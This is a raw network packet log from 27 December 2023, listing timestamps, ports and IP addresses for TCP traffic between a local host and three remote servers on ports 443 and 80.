Dec 27, 2023 18:12:20.506669998 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506671906 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506683111 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506706953 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506746054 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506746054 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506752014 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506761074 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506769896 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506788969 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506789923 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506807089 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506835938 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506848097 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506859064 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506875038 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506927013 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506932020 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506932020 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.506936073 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506947041 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.506999969 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507004023 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507004023 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507014036 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507029057 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507085085 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507086992 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507086992 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507096052 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507112980 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507169962 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507200956 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507201910 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507201910 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507209063 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507225990 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507225990 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507247925 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507296085 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507296085 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507296085 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507301092 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507308960 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507330894 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507389069 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507397890 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507397890 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507401943 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507416010 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507436037 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507440090 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507466078 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507484913 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507499933 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507517099 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507520914 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507548094 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507565022 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507586956 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507596970 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507608891 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507613897 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507643938 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507643938 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507661104 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507675886 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.507765055 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.507765055 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.511185884 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.511194944 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.511286020 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.512278080 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.512281895 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512294054 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512304068 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512420893 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.512424946 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512461901 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.512475967 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512501001 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512510061 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.512514114 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512527943 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.512598991 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.512604952 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512628078 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512646914 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.512650967 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512744904 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.512748957 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512774944 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.512778997 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512790918 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512938023 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.512938023 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.512945890 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512954950 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512979031 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.512986898 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513003111 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513036013 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513039112 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513108969 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513113976 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513158083 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513194084 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513194084 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513199091 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513209105 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513221979 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513227940 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513248920 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513308048 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513308048 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513308048 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513314009 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513322115 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513345003 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513386965 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513386965 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513386965 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513391018 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513418913 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513427019 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513427019 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513432026 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513453960 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513488054 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513498068 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513498068 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513504982 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513509989 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513524055 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513551950 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513575077 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513592005 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513634920 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513636112 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513636112 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513639927 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513650894 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513675928 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513705015 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513709068 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513727903 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513727903 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513736963 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513751984 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513811111 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513814926 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513814926 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513818979 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513834000 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513895988 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513899088 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513899088 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513906956 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513921976 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513979912 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.513988018 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513988018 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.513998985 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514025927 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514060974 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514066935 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514070988 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514094114 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514123917 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514130116 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514148951 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514152050 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514168024 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514185905 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514214039 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514230967 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514240980 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514245033 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514271975 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514271975 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514292955 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514308929 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514358997 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514358997 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514363050 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514370918 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514394045 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514401913 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514409065 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514436960 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514465094 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514467001 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514475107 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514492035 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514514923 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514519930 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514534950 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514542103 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514559031 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514561892 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514573097 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514620066 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514621019 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514626026 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514642000 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514659882 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514659882 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514666080 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514707088 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514728069 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514744043 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514744043 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514744043 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514749050 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514769077 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514781952 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514796019 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514808893 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514811993 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514828920 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514872074 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514884949 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514884949 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514897108 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514929056 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514960051 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514976025 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.514986038 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.514990091 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515011072 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515017986 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515042067 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515063047 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515088081 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515093088 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515132904 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515132904 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515152931 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515187025 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515191078 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515214920 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515222073 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515240908 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515292883 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515307903 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515321016 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515321016 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515326023 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515341997 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515357971 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515369892 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515373945 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515386105 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515436888 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515436888 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515436888 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515444040 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515470982 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.515491009 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.515508890 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.710838079 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.712455988 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.869797945 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.869822025 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:20.869915009 CET	49737	443	192.168.2.4	54.231.140.225
Dec 27, 2023 18:12:20.869921923 CET	443	49737	54.231.140.225	192.168.2.4
Dec 27, 2023 18:12:21.061328888 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 18:12:21.061369896 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 18:12:21.349517107 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:21.349530935 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:21.362274885 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:21.366123915 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 18:12:21.366149902 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 18:12:21.653940916 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:21.653959990 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:21.662626982 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 18:12:21.666058064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:21.718317032 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 18:12:21.910295010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:21.910446882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:21.910820961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.156529903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.157423019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.157437086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.157449007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.157461882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.157474995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.157502890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.157507896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.157536983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.157569885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.157582998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.157593966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.157604933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.157608032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.157619953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.157640934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.401885033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.401904106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.401963949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.410470963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.410490036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.410547018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.427635908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.427656889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.427701950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.444683075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.444714069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.444765091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.462001085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.462017059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.462083101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.479166985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.479183912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.479228973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.496295929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.496318102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.496362925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.513326883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.513343096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.513396025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.530374050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.530390024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.530440092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.547694921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.547713041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.547760010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.646255970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.646272898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.646322966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.654946089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.654966116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.655024052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.671952963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.672094107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.672152042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.689477921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.689496994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.689551115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.706254959 CET	80	49738	5.42.65.125	192.168.2.4
